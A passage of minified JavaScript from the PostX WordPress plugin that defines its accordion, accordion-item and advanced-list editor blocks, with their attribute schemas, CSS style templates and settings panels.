o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(64766),s=l(57288),p=l(28189);const{__}=wp.i18n,{Dropdown:c}=wp.components,{useEffect:u,useState:d,Fragment:m,useRef:g}=wp.element,{InnerBlocks:y,RichText:b,InspectorControls:v,BlockControls:h,useBlockProps:f}=wp.blockEditor,{updateBlockAttributes:k}=wp.data.dispatch("core/block-editor"),{getBlocks:w,getBlockOrder:x,getBlockIndex:T,toggleSelection:_,getSelectedBlock:C,getBlockAttributes:E,getBlockRootClientId:S,getSelectedBlockClientId:P}=wp.data.select("core/block-editor");function L(e){const[t,l]=d("Content"),{setAttributes:n,name:c,attributes:b,className:_,clientId:L,attributes:{blockId:B,currentPostId:U,advanceId:M,previewImg:A,activeBlock:H,triggerIconPosition:N,chooseTriggerIconClosed:j,chooseTriggerIconOpen:Z,triggerIcon:O,autoCollapseEnable:R,initSelectAcc:D}}=e,z=g();u((()=>{const e=L.substr(0,6),t=E(S(L));(0,a.qi)(n,t,U,L),B?B&&B!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||n({blockId:e})):n({blockId:e})}),[L]);const F={setAttributes:n,name:c,attributes:b,setSection:l,section:t,clientId:L};let W;if(B&&(W=(0,i.Kh)(b,"ultimate-post/accordion-item",B,(0,a.k0)())),A)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:A});let V=0;const G=T(L),q=C(),$=x(L).length>0;if(q){const e=q.clientId;V=T(e)}const K=S(L),J=w(K),[Y,X]=d(H),Q=!R||H,ee=S(P());u((()=>{!e.isSelected&&J.length>1&&q?.clientId!=K&&!ee&&X(!1)}),[e.isSelected]),u((()=>{D==G&&(X(!0),J.forEach(((e,t)=>{k(e.clientId,t==D?{activeBlock:!0}:{activeBlock:!1})})))}),[D]);const te=Z?.length>0?Z:"arrowUp2",le=j?.length>0?j:"collapse_bottom_line",oe=f({...M&&{id:M},className:`ultp-block-${B} ${_} ${Q&&Y?"active-accordion":""}`});return(0,o.createElement)(m,null,(0,o.createElement)(v,null,(0,o.createElement)(p.Z,{store:F})),(0,o.createElement)(h,null,(0,o.createElement)(s.Z,{store:F})),(0,o.createElement)("div",oe,W&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:W}}),(0,o.createElement)("div",{className:`ultp-accordion-item ultp-accordion__trigger-${N}`},(0,o.createElement)("div",{className:"ultp-accordion-item__navigation ultp-acr-navigation",onClick:()=>{return e=G,X(!Y),void(R&&J.forEach(((t,l)=>{k(t.clientId,l==e?{activeBlock:!0}:{activeBlock:!1})})));var e}},O&&(0,o.createElement)("div",{className:"ultp-accordion-item__control"},Q&&Y?r.ZP[te]:r.ZP[le]),(0,o.createElement)("div",{className:"ultp-accordion-item__nav-content"},(0,o.createElement)(I,{store:F,attributes:b,setAttributes:n}))),(0,o.createElement)("div",{ref:z,className:`ultp-accordion-item__content ${Q&&Y?"active":""} `},(0,o.createElement)("div",{className:"ultp-accordion-item__content-inside"},(0,o.createElement)(y,{renderAppender:$?void 0:()=>(0,o.createElement)(y.ButtonBlockAppender,null)}))))))}const I=({setAttributes:e,attributes:t,store:l})=>{const{accText:a,enableSubtitle:i,accSubText:n,enableTitleIcon:r,itemSingleIcon:s,titleIcon:p}=t;return(0,o.createElement)("div",{className:"ultp-accordion-item__text-content"},(0,o.createElement)("div",{className:"ultp-accordion-item__title-wrapper"},r&&(s?.length>0||p?.length>0)&&(0,o.createElement)(B,{itemSingleIcon:s,titleIcon:p,store:l}),(0,o.createElement)(b,{key:"editable",tagName:"div",className:"ultp-accordion-title",keeplaceholderonfocus:"true",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Add Your Main Text…","ultimate-post"),onChange:t=>e({accText:t}),value:a})),i&&(0,o.createElement)(b,{key:"editable",tagName:"div",className:"ultp-accordion-subtitle",allowedFormats:["ultimate-post/dynamic-content"],placeholder:__("Add some matching sub-text here….","ultimate-post"),onChange:t=>e({accSubText:t}),value:n}))},B=({itemSingleIcon:e,titleIcon:t,store:l})=>(0,o.createElement)("div",{className:"ultp-accordion-item__nav-icon"},(0,o.createElement)(c,{popoverProps:{placement:"bottom-start"},className:"ultp-listicon-dropdown",renderToggle:({onToggle:l,onClose:a})=>(0,o.createElement)("div",{onClick:()=>l(),className:"ultp-listicon-bg"},r.ZP[e&&e?.length>0?e:t]),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:e,label:"Update Single Icon",dynamicClass:" ",onChange:e=>l.setAttributes({itemSingleIcon:e})})}))},85057:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,enableTitleIcon:r,accText:s,triggerIconPosition:p,triggerIcon:c,enableSubtitle:u,accSubText:d,titleIcon:m,chooseTriggerIconOpen:g,chooseTriggerIconClosed:y,itemSingleIcon:b}=e.attributes,v=g?.length>0?g:"arrowUp2",h=y?.length>0?y:"collapse_bottom_line",f=n.save({...l&&{id:l},className:`ultp-block-${t} ultpMenuCss`});return(0,a.createElement)("div",(0,o.Z)({"data-bid":t},f),(0,a.createElement)("div",{className:`ultp-accordion-item ultp-accordion__trigger-${p}`},(0,a.createElement)("div",{className:"ultp-accordion-item__navigation ultp-acr-navigation"},c&&(0,a.createElement)("div",{className:"ultp-accordion-item__control"},"_ultp_aci_ic_"+v+"_ultp_aci_ic_end_","_ultp_aci_ic_"+h+"_ultp_aci_ic_end_"),(0,a.createElement)("div",{className:"ultp-accordion-item__nav-content"},(0,a.createElement)("div",{className:"ultp-accordion-item__text-content"},(0,a.createElement)("div",{className:"ultp-accordion-item__title-wrapper"},r&&(b&&b?.length||m.length>0)&&(0,a.createElement)("div",{className:"ultp-accordion-item__nav-icon"},"_ultp_aci_ic_"+(b&&b?.length>0?b:m)+"_ultp_aci_ic_end_"),(0,a.createElement)("div",{className:"ultp-accordion-title",dangerouslySetInnerHTML:{__html:s}})),u&&(0,a.createElement)("div",{className:"ultp-accordion-subtitle",dangerouslySetInnerHTML:{__html:d}})))),(0,a.createElement)("div",{className:"ultp-accordion-item__content ultp-acr-content"},(0,a.createElement)("div",{className:"ultp-accordion-item__content-inside"},(0,a.createElement)(i.Content,null)))))}},28189:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(92637),n=l(64766);const{__}=wp.i18n,{selectBlock:r}=wp.data.dispatch("core/block-editor"),s=({store:e})=>{const{getBlockRootClientId:t}=wp.data.select("core/block-editor"),{clientId:l}=e;return(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"accordion",title:__("Accordion","ultimate-post")},(0,o.createElement)("div",{className:"ultp-accordion-parent-selection",onClick:()=>(()=>{const e=t(l);r(e)})()},n.ZP.leftArrowLg," Go Back to Parent Settings"),(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"icon",key:"itemSingleIcon",help:"Enable Icons in the Main Settings to add Individual Icons",label:__("Individual Icon","ultimate-post")}}],initialOpen:!0,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{initialOpen:!0,store:e}),(0,o.createElement)(a.iv,{store:e})))}},59589:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},accText:{type:"string",default:"Add Your Accordion Title"},accSubText:{type:"string",default:"Add some matching sub-text here."},triggerIconPosition:{type:"string",default:"right"},enableTitleIcon:{type:"boolean",default:"true"},enableSubtitle:{type:"boolean",default:"true"},titleIcon:{type:"string",default:"rectangle_solid"},chooseTriggerIconOpen:{type:"string",default:"arrowUp2"},chooseTriggerIconClosed:{type:"string",default:"collapse_bottom_line"},triggerIcon:{type:"boolean",default:!0},activeBlock:{type:"boolean",default:!1},autoCollapseEnable:{type:"boolean",default:!0},itemSingleIcon:{type:"string",default:""},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-button-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},18866:(e,t,l)=>{"use strict";var o=l(67294),a=l(14370),i=l(85057),n=l(59589),r=l(16998);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/accordion-item.svg"}),parent:["ultimate-post/accordion"],attributes:n.Z,edit:a.Z,save:i.Z})},76931:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},accordionList:{type:"string",default:""},autoCollapseEnable:{type:"boolean",default:!0},initialSelectItem:{type:"string",default:"none"},enableSubtitle:{type:"boolean",default:!1},subtitlePosition:{type:"string",default:"bottom",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}]}]},enableTitleIcon:{type:"boolean",default:!1},titleIcon:{type:"string",default:"arrow_left_circle_line",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}]}]},titleIconPosition:{type:"string",default:"left",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}]}]},triggerIcon:{type:"boolean",default:!0},triggerIconPosition:{type:"string",default:"right",style:[{depends:[{key:"triggerIcon",condition:"==",value:!0}]}]},chooseTriggerIconOpen:{type:"string",default:"arrowUp2",style:[{depends:[{key:"triggerIcon",condition:"==",value:!0}]}]},chooseTriggerIconClosed:{type:"string",default:"collapse_bottom_line",style:[{depends:[{key:"triggerIcon",condition:"==",value:!0}]}]},barContentAlignment:{type:"string",default:"left",style:[{depends:[{key:"barContentAlignment",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: center; }\n            {{ULTP}} .ultp-accordion-item__text-content { align-items: center; text-align: center; }"},{depends:[{key:"barContentAlignment",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-items-wrap { grid-template-columns: repeat({{columns}}, 1fr); }"},{depends:[{key:"barContentAlignment",condition:"==",value:"right"},{key:"subtitlePosition",condition:"!=",value:"bottom"},{key:"subtitlePosition",condition:"!=",value:"top"}],selector:"\n            {{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: flex-start; flex-direction: row-reverse; } \n            {{ULTP}} .ultp-accordion-item__text-content { align-items: center; text-align: right; } \n            "},{depends:[{key:"barContentAlignment",condition:"==",value:"right"},{key:"subtitlePosition",condition:"==",value:"bottom"}],selector:"\n            {{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: flex-start; flex-direction: row-reverse; } \n            {{ULTP}} .ultp-accordion-item__text-content { align-items: flex-end; text-align: right; } \n            "},{depends:[{key:"barContentAlignment",condition:"==",value:"right"},{key:"subtitlePosition",condition:"==",value:"top"}],selector:"\n            {{ULTP}} .ultp-accordion-item__nav-content { width: 100%; display: flex; justify-content: flex-start; flex-direction: row-reverse; } \n            {{ULTP}} .ultp-accordion-item__text-content { align-items: flex-end; text-align: right; } \n            "}]},titleTypo:{type:"object",default:{openTypography:1,size:{lg:18,unit:"px"},height:{lg:"22",unit:"px"},decoration:"none",family:"",weight:500},style:[{selector:"{{ULTP}} .ultp-accordion-title"}]},subtextTypo:{type:"object",default:{openTypography:1,size:{lg:14,unit:"px"},height:{lg:"28",unit:"px"},decoration:"none",family:"",weight:400},style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-subtitle"}]},titleIconSize:{type:"object",default:{lg:"18",unit:"px"},style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__nav-icon svg { height:{{titleIconSize}}; width:{{titleIconSize}}; }"}]},titleColor:{type:"string",default:"#070707",style:[{selector:"{{ULTP}} .ultp-accordion-title { color:{{titleColor}}; }"}]},subtitleColor:{type:"string",default:"#484848",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-subtitle { color:{{subtitleColor}}; }"}]},titleIconColor:{type:"string",default:"#070707",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__nav-icon svg { color:{{titleIconColor}}; }"}]},titleHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-title { color:{{titleHoverColor}}; }"}]},subtitleHoverColor:{type:"string",default:"",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-subtitle { color:{{subtitleHoverColor}}; }"}]},iconHoverColor:{type:"string",default:"",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-item__nav-icon svg { color:{{iconHoverColor}}; }"}]},titleActiveColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-title { color:{{titleActiveColor}}; }"}]},subtitleActiveColor:{type:"string",default:"",style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-subtitle { color:{{subtitleActiveColor}}; }"}]},iconActiveColor:{type:"string",default:"",style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__nav-icon svg { color:{{iconActiveColor}}; }"}]},titleSubtextGap:{type:"object",default:{lg:"6",unit:"px"},style:[{depends:[{key:"enableSubtitle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__text-content { gap:{{titleSubtextGap}}; }"}]},titleIconGap:{type:"object",default:{lg:"12",unit:"px"},style:[{depends:[{key:"enableTitleIcon",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-accordion-item__title-wrapper { gap:{{titleIconGap}}; }"}]},triIconSize:{type:"object",default:{lg:"21",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { width:{{triIconSize}}; height:{{triIconSize}}; }"}]},titleTriggerIconGap:{type:"object",default:{lg:"24",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation { gap:{{titleTriggerIconGap}}; }"}]},triIconColor:{type:"string",default:"#070707",style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { color:{{triIconColor}}; }"}]},triIconBg:{type:"object",default:{openColor:0,type:"color",color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg"}]},triIconBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg"}]},triIconRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { border-radius: {{triIconRadius}}; }"}]},triIconHoverColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg:hover { color: {{triIconHoverColor}}; }"}]},triIconHoverBg:{type:"object",default:{openColor:0,type:"color",color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover .ultp-accordion-item__control svg"}]},triIconHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg:hover { gap:{{titleIconGap}}; }"}]},triIconHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg:hover { gap:{{triIconHoverRadius}}; }"}]},triIconActiveColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg { color:{{triIconActiveColor}}; }"}]},triIconActiveBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg"}]},triIconActiveBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg"}]},triIconActiveRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation .ultp-accordion-item__control svg { border-radius:{{triIconActiveRadius}}; }"}]},triIconPadding:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__control svg { padding:{{triIconPadding}}; }"}]},barWrapGap:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-accordion-wrapper > .block-editor-inner-blocks > .block-editor-block-list__layout,\n            .postx-page {{ULTP}} > .ultp-accordion-wrapper { gap:{{barWrapGap}}; }"}]},barWrapBg:{type:"object",default:{openColor:1,type:"color",color:"#E9E9E9"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation"}]},barWrapBorder:{type:"object",default:{openBorder:1,width:{top:1,right:1,bottom:1,left:1},color:"#DEDEDE",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation"}]},barWrapRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation { border-radius:{{barWrapRadius}}; }"}]},barWrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation"}]},barWrapHoverBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover"}]},barWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover"}]},barWrapHoverRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover { border-radius: {{barWrapHoverRadius}}; }"}]},barWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation:hover"}]},barWrapActiveBg:{type:"object",default:{openColor:0,type:"color",color:""},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation"}]},barWrapActiveBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation"}]},barWrapActiveRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation { border-radius:{{barWrapActiveRadius}} }"}]},barWrapActiveShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .wp-block-ultimate-post-accordion-item.active-accordion .ultp-accordion-item__navigation"}]},barWrapperPadding:{type:"object",default:{lg:{top:20,bottom:20,left:32,right:32,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__navigation { padding:{{barWrapperPadding}}; }"}]},contentBarGap:{type:"object",default:{lg:"0",unit:"px"},style:[{selector:"{{ULTP}} .ultp-accordion-item { gap:{{contentBarGap}}; }"}]},contentBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-accordion-item__content"}]},contentRadius:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-accordion-item__content-inside { border-radius: {{contentRadius}}; }"}]},contentPadding:{type:"object",default:{lg:{top:0,bottom:0,left:0,right:0,unit:"px"}},style:[{selector:".postx-page {{ULTP}} .ultp-accordion-item__content-inside, \n            .block-editor-block-list__layout {{ULTP}} .ultp-accordion-item__content.active .ultp-accordion-item__content-inside { padding: {{contentPadding}}; }"}]},contentBg:{type:"object",default:{openColor:0,type:"color",color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-accordion-item__content-inside"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-block-wrapper {z-index: {{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},92038:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(87668),n=l(70124),r=l(76931),s=l(10981);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/accordion-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/accordion.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Create collapsible content sections","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/accordion.svg"}},edit:i.Z,save:n.Z})},43166:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(67294),a=l(53049),i=l(99838),n=l(31760),r=l(63599);const{__}=wp.i18n,{InspectorControls:s,InnerBlocks:p,useBlockProps:c}=wp.blockEditor,{useState:u,useEffect:d,useRef:m,Fragment:g}=wp.element,{getBlockAttributes:y,getBlockRootClientId:b}=wp.data.select("core/block-editor");function v(e){const t=m(null),[l,v]=u("Content"),{setAttributes:h,name:f,isSelected:k,className:w,attributes:x,clientId:T,attributes:{previewImg:_,blockId:C,advanceId:E,layout:S,listGroupIconType:P,listCustomIcon:L,listGroupCustomImg:I,listDisableText:B,listGroupSubtextEnable:U,listGroupBelowIcon:M,enableIcon:A,listLayout:H,currentPostId:N}}=e;d((()=>{const e=T.substr(0,6),t=y(b(T));(0,a.qi)(h,t,N,T),C?C&&C!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||h({blockId:e})):h({blockId:e})}),[T]),d((()=>{const e=t.current;var l;e?((l=e).listGroupIconType!=P||l.listCustomIcon!=L||l.listGroupBelowIcon!=M||l.listGroupCustomImg!=I||l.listDisableText!=B||l.listGroupSubtextEnable!=U||l.enableIcon!=A||l.listLayout!=H||l.layout!=S)&&((0,a.Gu)(T),t.current=x):t.current=x}),[x]);const j={setAttributes:h,name:f,attributes:x,setSection:v,section:l,clientId:T};let Z;if(C&&(Z=(0,i.Kh)(x,"ultimate-post/advanced-list",C,(0,a.k0)())),_&&!k)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:_});d((()=>{k&&_&&h({previewImg:""})}),[e?.isSelected]);const O=c({...E&&{id:E},className:`ultp-block-${C} ${w}`});return(0,o.createElement)(g,null,(0,o.createElement)(s,null,(0,o.createElement)(r.Z,{store:j})),(0,o.createElement)(n.Z,{include:[{type:"template"},{type:"layout",block:"advance-list",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/list/list1.svg",label:"Layout 1",value:"layout1"},{img:"assets/img/layouts/list/list2.svg",label:"Layout 2",value:"layout2"},{img:"assets/img/layouts/list/list3.svg",label:"Layout 3",value:"layout3"}]}],store:j}),(0,o.createElement)("div",O,Z&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:Z}}),(0,o.createElement)("ul",{className:`ultp-list-wrapper ultp-list-${S}`},(0,o.createElement)(p,{template:[["ultimate-post/list",{listText:"List Item"}],["ultimate-post/list",{listText:"List Item"}],["ultimate-post/list",{listText:"List Item"}]],allowedBlocks:["ultimate-post/list"]}))))}},36988:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294);const{Component:a}=wp.element,{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,layout:a}=e.attributes,r=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("div",r,(0,o.createElement)("ul",{className:`ultp-list-wrapper ultp-list-${a}`},(0,o.createElement)(i.Content,null)))}},63599:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(67294),a=l(53049),i=l(92637),n=l(43581);const{__}=wp.i18n,r=({store:e})=>(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid7994",store:e}),(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"global",title:__("Global Style","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"layout",block:"advance-list",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/list/list1.svg",label:"Layout 1",value:"layout1",pro:!1},{img:"assets/img/layouts/list/list2.svg",label:"Layout 2",value:"layout2",pro:!1},{img:"assets/img/layouts/list/list3.svg",label:"Layout 3",value:"layout3",pro:!1}]}},{position:2,data:{type:"toggle",key:"listInline",label:__("Inline View","ultimate-post")}},{position:3,data:{type:"alignment",block:"advance-list",key:"listAlignment",disableJustify:!0,label:__("Vertical Alignment (Align Items)","ultimate-post")}},{position:4,data:{type:"range",key:"listSpaceBetween",min:0,max:300,step:1,responsive:!0,label:__("Space Between Items","ultimate-post")}},{position:5,data:{type:"range",key:"listSpaceIconText",min:0,max:300,step:1,responsive:!0,label:__("Spacing Between Icon & Texts","ultimate-post")}},{position:6,data:{type:"group",key:"listPosition",justify:!0,label:__("Icon Position","ultimate-post"),options:[{value:"start",label:__("Top","ultimate-post")},{value:"center",label:__("Center","ultimate-post")},{value:"end",label:__("Bottom","ultimate-post")}]}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("List Icon/Image","ultimate-post"),depend:"enableIcon",include:[{position:1,data:{type:"tag",key:"listGroupIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"image",label:__("Image","ultimate-post")},{value:"default",label:__("Default","ultimate-post")},{value:"",label:__("None","ultimate-post")}]}},{position:2,data:{type:"select",key:"listLayout",label:__("List Style","ultimate-post"),options:[{label:__("Select","ultimate-post"),value:""},{label:__("By Abc","ultimate-post"),value:"abc"},{label:__("By Roman Number","ultimate-post"),value:"roman"},{label:__("By 123","ultimate-post"),value:"number"},{label:__("By Bullet","ultimate-post"),value:"bullet"}]}},{position:3,data:{type:"icon",key:"listCustomIcon",label:__("Icon Store","ultimate-post")}},{position:4,data:{type:"media",key:"listGroupCustomImg",label:__("Upload Custom Image","ultimate-post")}},{position:5,data:{type:"dimension",key:"listImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}},{position:6,data:{type:"typography",key:"listIconTypo",label:__("Typography","ultimate-post")}},{position:7,data:{type:"range",key:"listGroupIconSize",label:__("Icon/Image Size","ultimate-post")}},{position:8,data:{type:"range",key:"listGroupBgSize",label:__("Background Size","ultimate-post"),help:"Icon Background Color Required"}},{position:9,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:10,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"listGroupIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"listGroupIconbg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listGroupIconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"listGroupHoverIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"listGroupHoverIconbg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listGroupHoverIconBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"listGroupHoverIconRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}]}]}}],initialOpen:!1,store:e}),(0,o.createElement)(a.T,{title:__("Content","ultimate-post"),include:[{position:1,data:{type:"toggle",key:"listDisableText",label:__("Disable Text","ultimate-post")}},{position:2,data:{type:"typography",key:"listTextTypo",label:__("Title Typography","ultimate-post")}},{position:3,data:{type:"color",key:"listGroupTitleColor",label:__("Title Color","ultimate-post")}},{position:4,data:{type:"color",key:"listGroupTitleHoverColor",label:__("Title Hover Color","ultimate-post")}},{position:5,data:{type:"toggle",key:"listGroupSubtextEnable",label:__("Enable Subtext","ultimate-post")}},{position:6,data:{type:"typography",key:"listGroupSubtextTypo",label:__("Subtext 